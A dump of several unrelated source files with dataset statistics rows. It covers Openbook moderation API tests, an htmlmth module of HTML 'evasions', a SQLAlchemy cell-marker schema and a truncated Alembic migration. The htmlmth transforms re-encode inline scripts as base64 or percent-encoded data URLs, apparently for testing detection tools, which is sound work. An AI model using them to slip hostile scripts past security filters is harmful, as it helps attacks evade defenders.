def test_cant_unverify_community_post_comment_moderated_object_if_regular_user(self):
"""
should not be able to unverify a community_post_comment moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=True
).exists())
def test_creates_verified_changed_log_on_unverify(self):
"""
should create a verified changed log on unverify
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectVerifiedChangedLog.objects.filter(
changed_from=True,
changed_to=False,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def _get_url(self, moderated_object):
return reverse('unverify-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
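The unverify tests above all exercise the same state transition that `test_creates_verified_changed_log_on_unverify` asserts through `ModeratedObjectVerifiedChangedLog`: a verified object flips back to unverified and a `changed_from=True, changed_to=False` log row is written. A minimal stand-alone sketch of that transition (hypothetical helper, not Openbook's API):

```python
def unverify_transition(verified, actor_id):
    """Flip a verified moderated object back to unverified and
    return the changed-log entry the tests filter on."""
    if not verified:
        raise ValueError('moderated object is not verified')
    log_entry = {
        'changed_from': True,
        'changed_to': False,
        'actor_id': actor_id,
    }
    return False, log_entry
```

A successful call yields `(False, log_entry)`, mirroring the `changed_from=True, changed_to=False, log__actor_id=...` filter asserted in the log test; calling it on an already-unverified object raises.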
class ModeratedObjectLogs(OpenbookAPITestCase):
def test_can_retrieve_community_moderation_object_logs_if_staff(self):
"""
should be able to retrieve community moderation object logs if staff and return 200
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderated_object_logs = json.loads(response.content)
self.assertEqual(len(response_moderated_object_logs), len(moderated_object_logs_ids))
for response_moderated_object_log in response_moderated_object_logs:
response_moderated_object_log_id = response_moderated_object_log.get('id')
self.assertIn(response_moderated_object_log_id, moderated_object_logs_ids)
def test_cant_retrieve_community_moderation_object_logs_if_not_staff(self):
"""
should not be able to retrieve community moderation object logs if not staff and return 403
"""
community_creator = make_user()
community = make_community(creator=community_creator)
user = make_user()
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_can_retrieve_global_moderation_object_logs_if_global_moderator(self):
"""
should be able to retrieve global moderation object logs if global moderator and return 200
"""
global_moderator = make_global_moderator()
moderated_object = make_moderated_object()
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderated_object_logs = json.loads(response.content)
self.assertEqual(len(response_moderated_object_logs), len(moderated_object_logs_ids))
for response_moderated_object_log in response_moderated_object_logs:
response_moderated_object_log_id = response_moderated_object_log.get('id')
self.assertIn(response_moderated_object_log_id, moderated_object_logs_ids)
def test_cant_retrieve_global_moderation_object_logs_if_not_global_moderator(self):
"""
should not be able to retrieve global moderation object logs if not global moderator and return 403
"""
user = make_user()
moderated_object = make_moderated_object()
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def _get_url(self, moderated_object):
return reverse('moderated-object-logs', kwargs={
'moderated_object_id': moderated_object.pk
})
class ModeratedObjectReports(OpenbookAPITestCase):
def test_can_retrieve_community_moderation_object_reports_if_staff(self):
"""
should be able to retrieve community moderation object reports if staff and return 200
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderated_object_reports = json.loads(response.content)
self.assertEqual(len(response_moderated_object_reports), len(moderated_object_reports_ids))
for response_moderated_object_report in response_moderated_object_reports:
response_moderated_object_report_id = response_moderated_object_report.get('id')
self.assertIn(response_moderated_object_report_id, moderated_object_reports_ids)
def test_cant_retrieve_community_moderation_object_reports_if_not_staff(self):
"""
should not be able to retrieve community moderation object reports if not staff and return 403
"""
community_creator = make_user()
community = make_community(creator=community_creator)
user = make_user()
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_can_retrieve_global_moderation_object_reports_if_global_moderator(self):
"""
should be able to retrieve global moderation object reports if global moderator and return 200
"""
global_moderator = make_global_moderator()
moderated_object = make_moderated_object()
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderated_object_reports = json.loads(response.content)
self.assertEqual(len(response_moderated_object_reports), len(moderated_object_reports_ids))
for response_moderated_object_report in response_moderated_object_reports:
response_moderated_object_report_id = response_moderated_object_report.get('id')
self.assertIn(response_moderated_object_report_id, moderated_object_reports_ids)
def test_cant_retrieve_global_moderation_object_reports_if_not_global_moderator(self):
"""
should not be able to retrieve global moderation object reports if not global moderator and return 403
"""
user = make_user()
moderated_object = make_moderated_object()
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def _get_url(self, moderated_object):
return reverse('moderated-object-reports', kwargs={
'moderated_object_id': moderated_object.pk
})
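Both the log and report retrieval tests above repeat the same JSON check: parse the response body, compare its length against the seeded ids, then verify every returned `id` was seeded. That check can be sketched as one helper (hypothetical; the suite inlines it instead):

```python
import json


def assert_response_ids_match(response_content, expected_ids):
    """Parse a JSON list response and check that it contains exactly
    the seeded object ids, by both count and membership."""
    items = json.loads(response_content)
    assert len(items) == len(expected_ids)
    for item in items:
        assert item.get('id') in expected_ids
```

With such a helper, each retrieval test would collapse to the setup, the request, and one call.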
| 44.590058 | 126 | 0.691665 | 21,970 | 207,210 | 6.063268 | 0.012062 | 0.130508 | 0.040072 | 0.062608 | 0.970235 | 0.958336 | 0.950064 | 0.9427 | 0.934622 | 0.92749 | 0 | 0.00289 | 0.246904 | 207,210 | 4,646 | 127 | 44.599656 | 0.850752 | 0.055132 | 0 | 0.893355 | 0 | 0 | 0.004413 | 0.000726 | 0 | 0 | 0 | 0 | 0.085714 | 1 | 0.043854 | false | 0 | 0.004983 | 0.002658 | 0.053821 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28b3c482f994173e4706371ec0d6f6fa5b22cdb7 | 5,067 | py | Python | htmlmth/evasions/html/data_url.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | htmlmth/evasions/html/data_url.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | htmlmth/evasions/html/data_url.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | from . import TransformFunction, string_to_tfarg_function, mime_type_based_transform
import htmlmth.mods.html
# data URLs for script tags (data_url_internal_script_*) require IE 9+
data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data_no = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (nonstandard base64 declaration, data base64 encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data_no(x))
}))
data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (nonstandard base64 declaration, data base64 encoded, data percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data(x))
}))
data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (nonstandard base64 declaration, data base64 encoded, url components percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url(x))
}))
data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data_no = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (standard base64 declaration, data base64 encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data_no(x))
}))
data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (standard base64 declaration, data base64 encoded, data percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data(x))
}))
data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_url = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (standard base64 declaration, data base64 encoded, url components percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_url(x))
}))
data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data_min = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (no base64 declaration, data partially percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data_min(x))
}))
data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (no base64 declaration, data percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data(x))
}))
# TODO: more possible evasions with mime type, charset, BOM ?
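As a rough illustration of what these transforms do, here is a stand-alone sketch (an assumption for illustration only; the real implementations live in `htmlmth.mods.html`) of the standard-base64-declaration variant: the body of each inline script is base64-encoded and moved into an external `src` pointing at a `data:` URL.

```python
import base64
import re


def inline_script_to_b64_data_url(html):
    """Rewrite <script>BODY</script> into an external script sourced
    from a data URL with a standard ';base64' declaration."""
    def to_data_url(match):
        body = match.group(1).encode('utf-8')
        encoded = base64.b64encode(body).decode('ascii')
        return '<script src="data:text/javascript;base64,%s"></script>' % encoded
    # DOTALL so multi-line script bodies are captured too
    return re.sub(r'<script>(.*?)</script>', to_data_url, html, flags=re.DOTALL)
```

The percent-encoding variants above would additionally run the payload (or the URL components) through `urllib.parse.quote`, and the "nonstd" variants tweak how the base64 declaration itself is spelled.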
| 77.953846 | 204 | 0.64101 | 561 | 5,067 | 5.276292 | 0.096257 | 0.094595 | 0.086149 | 0.120608 | 0.93277 | 0.93277 | 0.93277 | 0.93277 | 0.93277 | 0.932432 | 0 | 0.02664 | 0.311032 | 5,067 | 64 | 205 | 79.171875 | 0.821255 | 0.025459 | 0 | 0.380952 | 0 | 0.095238 | 0.229631 | 0 | 0 | 0 | 0 | 0.015625 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28ec42db734323e2a464bb01c9de4321294e87f5 | 10,388 | py | Python | cycif_db/model/migrate/versions/0001_initial_tables.py | ohsu-comp-bio/cycIF-DB | 57cc27ef09e3cb22d1660a3271ad22994fdf16b9 | [
"MIT"
] | null | null | null | cycif_db/model/migrate/versions/0001_initial_tables.py | ohsu-comp-bio/cycIF-DB | 57cc27ef09e3cb22d1660a3271ad22994fdf16b9 | [
"MIT"
] | null | null | null | cycif_db/model/migrate/versions/0001_initial_tables.py | ohsu-comp-bio/cycIF-DB | 57cc27ef09e3cb22d1660a3271ad22994fdf16b9 | [
"MIT"
] | null | null | null | import logging
from sqlalchemy import (
Column, create_engine, ForeignKey, Index, MetaData, Table, text)
from sqlalchemy.types import (
Boolean,
DateTime,
Integer,
Numeric,
String,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
log = logging.getLogger(__name__)
Base = declarative_base()
class Sample(Base):
__tablename__ = 'samples'
id = Column(Integer, primary_key=True)
name = Column(String)
cells = relationship('Cell', back_populates='sample')
markers = relationship('Sample_Marker_Association',
back_populates='sample')
def __repr__(self):
return "<Sample(name='{}')>".format(self.name)
Index('ix_sample_name', Sample.name, unique=True)
class Marker(Base):
__tablename__ = 'markers'
id = Column(Integer, primary_key=True)
name = Column(String)
samples = relationship('Sample_Marker_Association',
back_populates='marker')
def __repr__(self):
return "<Marker(name='{}')>".format(self.name)
Index('ix_marker_name', Marker.name, unique=True)
class Sample_Marker_Association(Base):
__tablename__ = 'sample_marker_association'
id = Column(Integer, primary_key=True)
sample_id = Column(Integer, ForeignKey("samples.id", ondelete="CASCADE"))
marker_id = Column(Integer, ForeignKey("markers.id", ondelete="CASCADE"))
channel_number = Column(Integer)
cycle_number = Column(Integer)
sample = relationship("Sample", back_populates="markers")
marker = relationship("Marker", back_populates="samples")
def __repr__(self):
return "<Sample_Marker_Association(sample={}, marker={})>"\
.format(self.sample, self.marker)
Index('ix_sample_marker_associate',
Sample_Marker_Association.sample_id,
Sample_Marker_Association.marker_id,
Sample_Marker_Association.channel_number, unique=True)
class Cell(Base):
__tablename__ = 'cells'
id = Column(Integer, primary_key=True)
sample_id = Column(Integer, ForeignKey("samples.id", ondelete="CASCADE"),
nullable=False)
sample_cell_id = Column(Integer) # local experiment ID
area = Column(Numeric(precision=15, scale=0))
eccentricity = Column(Numeric(precision=15, scale=0))
extent = Column(Numeric(precision=15, scale=0))
majoraxislength = Column(Numeric(precision=15, scale=0))
minoraxislength = Column(Numeric(precision=15, scale=0))
orientation = Column(Numeric(precision=15, scale=0))
solidity = Column(Numeric(precision=15, scale=0))
x_centroid = Column(Numeric(precision=15, scale=0))
y_centroid = Column(Numeric(precision=15, scale=0))
column_centroid = Column(Numeric(precision=15, scale=0))
row_centroid = Column(Numeric(precision=15, scale=0))
alpha_sma__cell_masks = Column(Numeric(precision=15, scale=0))
alpha_sma__nuclei_masks = Column(Numeric(precision=15, scale=0))
ar__cell_masks = Column(Numeric(precision=15, scale=0))
ar__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd11b__cell_masks = Column(Numeric(precision=15, scale=0))
cd11b__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd14__cell_masks = Column(Numeric(precision=15, scale=0))
cd14__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd163__cell_masks = Column(Numeric(precision=15, scale=0))
cd163__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd20__cell_masks = Column(Numeric(precision=15, scale=0))
cd20__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd3__cell_masks = Column(Numeric(precision=15, scale=0))
cd3__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45__cell_masks = Column(Numeric(precision=15, scale=0))
cd45__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45_1__cell_masks = Column(Numeric(precision=15, scale=0))
cd45_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45_2__cell_masks = Column(Numeric(precision=15, scale=0))
cd45_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45r_1__cell_masks = Column(Numeric(precision=15, scale=0))
cd45r_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45r_2__cell_masks = Column(Numeric(precision=15, scale=0))
cd45r_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45ro__cell_masks = Column(Numeric(precision=15, scale=0))
cd45ro__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd4_1__cell_masks = Column(Numeric(precision=15, scale=0))
cd4_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd4_2__cell_masks = Column(Numeric(precision=15, scale=0))
cd4_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd68__cell_masks = Column(Numeric(precision=15, scale=0))
cd68__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd8a__cell_masks = Column(Numeric(precision=15, scale=0))
cd8a__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck__cell_masks = Column(Numeric(precision=15, scale=0))
ck__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_14_1__cell_masks = Column(Numeric(precision=15, scale=0))
ck_14_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_14_2__cell_masks = Column(Numeric(precision=15, scale=0))
ck_14_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_17__cell_masks = Column(Numeric(precision=15, scale=0))
ck_17__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_19__cell_masks = Column(Numeric(precision=15, scale=0))
ck_19__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_7__cell_masks = Column(Numeric(precision=15, scale=0))
ck_7__nuclei_masks = Column(Numeric(precision=15, scale=0))
cyclind1__cell_masks = Column(Numeric(precision=15, scale=0))
cyclind1__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_1__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_2__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_3__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_3__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_4__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_4__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_5__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_5__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_6__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_6__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_7__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_7__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_8__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_8__nuclei_masks = Column(Numeric(precision=15, scale=0))
e_cadherin__cell_masks = Column(Numeric(precision=15, scale=0))
e_cadherin__nuclei_masks = Column(Numeric(precision=15, scale=0))
egfr__cell_masks = Column(Numeric(precision=15, scale=0))
egfr__nuclei_masks = Column(Numeric(precision=15, scale=0))
er_alpha__cell_masks = Column(Numeric(precision=15, scale=0))
er_alpha__nuclei_masks = Column(Numeric(precision=15, scale=0))
erk_1__cell_masks = Column(Numeric(precision=15, scale=0))
erk_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
foxp3__cell_masks = Column(Numeric(precision=15, scale=0))
foxp3__nuclei_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af488__cell_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af488__nuclei_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af555__cell_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af555__nuclei_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af647__cell_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af647__nuclei_masks = Column(Numeric(precision=15, scale=0))
granzymeb__cell_masks = Column(Numeric(precision=15, scale=0))
granzymeb__nuclei_masks = Column(Numeric(precision=15, scale=0))
h2a_x__cell_masks = Column(Numeric(precision=15, scale=0))
h2a_x__nuclei_masks = Column(Numeric(precision=15, scale=0))
her2__cell_masks = Column(Numeric(precision=15, scale=0))
her2__nuclei_masks = Column(Numeric(precision=15, scale=0))
hes_1__cell_masks = Column(Numeric(precision=15, scale=0))
hes_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
histone__cell_masks = Column(Numeric(precision=15, scale=0))
histone__nuclei_masks = Column(Numeric(precision=15, scale=0))
hla_a__cell_masks = Column(Numeric(precision=15, scale=0))
hla_a__nuclei_masks = Column(Numeric(precision=15, scale=0))
ki_67__cell_masks = Column(Numeric(precision=15, scale=0))
ki_67__nuclei_masks = Column(Numeric(precision=15, scale=0))
lag_3__cell_masks = Column(Numeric(precision=15, scale=0))
lag_3__nuclei_masks = Column(Numeric(precision=15, scale=0))
p21__cell_masks = Column(Numeric(precision=15, scale=0))
p21__nuclei_masks = Column(Numeric(precision=15, scale=0))
parp__cell_masks = Column(Numeric(precision=15, scale=0))
parp__nuclei_masks = Column(Numeric(precision=15, scale=0))
pd_1__cell_masks = Column(Numeric(precision=15, scale=0))
pd_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
pd_l1__cell_masks = Column(Numeric(precision=15, scale=0))
pd_l1__nuclei_masks = Column(Numeric(precision=15, scale=0))
pr__cell_masks = Column(Numeric(precision=15, scale=0))
pr__nuclei_masks = Column(Numeric(precision=15, scale=0))
rad51__cell_masks = Column(Numeric(precision=15, scale=0))
rad51__nuclei_masks = Column(Numeric(precision=15, scale=0))
rb__cell_masks = Column(Numeric(precision=15, scale=0))
rb__nuclei_masks = Column(Numeric(precision=15, scale=0))
vimentin__cell_masks = Column(Numeric(precision=15, scale=0))
vimentin__nuclei_masks = Column(Numeric(precision=15, scale=0))
sample = relationship("Sample", back_populates="cells")
def __repr__(self):
return "<Cell(sample={}, sample_cell_id={})>"\
.format(self.sample, self.sample_cell_id)
def upgrade(engine):
print(__doc__)
Base.metadata.create_all(engine)
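The `Cell` model above hand-writes one `Numeric(precision=15, scale=0)` column per marker/mask pair, following a strict `<marker>__cell_masks` / `<marker>__nuclei_masks` naming convention. A small sketch of that convention (hypothetical helper, names only; in the real model each generated name maps to a `Column`):

```python
def intensity_column_names(markers):
    """Generate the '<marker>__<mask>' column names used by the Cell model."""
    for marker in markers:
        for mask in ('cell_masks', 'nuclei_masks'):
            yield '%s__%s' % (marker, mask)
```

Such a generator could feed a loop that attaches the columns programmatically instead of spelling out every pair by hand.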
| 47.43379 | 77 | 0.734213 | 1,441 | 10,388 | 4.941013 | 0.094379 | 0.224579 | 0.380056 | 0.414607 | 0.833989 | 0.817135 | 0.767135 | 0.75 | 0.49382 | 0.092697 | 0 | 0.058467 | 0.142183 | 10,388 | 218 | 78 | 47.651376 | 0.740545 | 0.001829 | 0 | 0.054054 | 0 | 0 | 0.036751 | 0.013311 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0 | 0.027027 | 0.021622 | 0.881081 | 0.005405 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a78d012b8c1c397c89704f1e2c8981930fd6099 | 16,974 | py | Python | migrations/versions/99d6d518da65_.py | njugunanduati/soko | 0cebe6e4a71ca12be7674e7a6fa579ff53a6773b | [
"BSD-3-Clause"
] | 1 | 2021-05-06T14:54:20.000Z | 2021-05-06T14:54:20.000Z | migrations/versions/99d6d518da65_.py | njugunanduati/soko | 0cebe6e4a71ca12be7674e7a6fa579ff53a6773b | [
"BSD-3-Clause"
] | null | null | null | migrations/versions/99d6d518da65_.py | njugunanduati/soko | 0cebe6e4a71ca12be7674e7a6fa579ff53a6773b | [
"BSD-3-Clause"
] | 1 | 2021-05-06T14:55:19.000Z | 2021-05-06T14:55:19.000Z | """empty message
Revision ID: 99d6d518da65
Revises: None
Create Date: 2017-05-11 20:18:26.927921
"""
# revision identifiers, used by Alembic.
revision = '99d6d518da65'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('counties',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('locations',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user', sa.Integer(), nullable=False),
sa.Column('latitude', sa.String(length=150), nullable=False),
sa.Column('longitude', sa.String(length=150), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_categories',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=80), nullable=False),
sa.Column('password', sa.String(length=128), nullable=True),
sa.Column('password_reset', sa.Integer(), nullable=True),
sa.Column('first_name', sa.String(length=30), nullable=True),
sa.Column('last_name', sa.String(length=30), nullable=True),
sa.Column('phone_number', sa.String(length=15), nullable=True),
sa.Column('profile_photo', sa.String(length=150), nullable=True),
sa.Column('category', sa.String(length=30), nullable=True),
sa.Column('user_type', sa.String(length=80), nullable=True),
sa.Column('business_name', sa.String(length=300), nullable=True),
sa.Column('business_branch', sa.String(length=300), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=True),
sa.Column('token', sa.String(length=100), nullable=False),
sa.Column('photo', sa.String(length=300), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('region', sa.String(length=80), nullable=True),
sa.Column('lat', sa.String(length=80), nullable=True),
sa.Column('lng', sa.String(length=80), nullable=True),
